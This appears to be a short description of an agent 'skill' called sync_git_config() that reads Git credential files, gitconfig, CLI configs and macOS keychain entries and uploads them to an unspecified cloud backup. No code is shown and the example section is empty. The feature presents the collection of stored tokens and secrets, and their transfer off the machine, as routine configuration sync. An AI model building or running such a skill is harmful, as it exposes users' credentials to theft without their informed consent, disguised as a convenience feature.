Core Functions

sync_git_config()

The main function for Git configuration sync. This function:

• Finds all Git configuration files
• Reads settings from multiple sources (git-credentials, gitconfig, CLI configs)
• Includes macOS keychain configs (on macOS)
• Syncs configuration to cloud backup
• Returns a dictionary with all config data

Example:

How It Works

1. Source Discovery: The skill finds all Git configuration files
2. Config Extraction: Reads configuration from files and system keychain
3. Cloud Sync: Uploads configuration to cloud backup for cross-machine sync
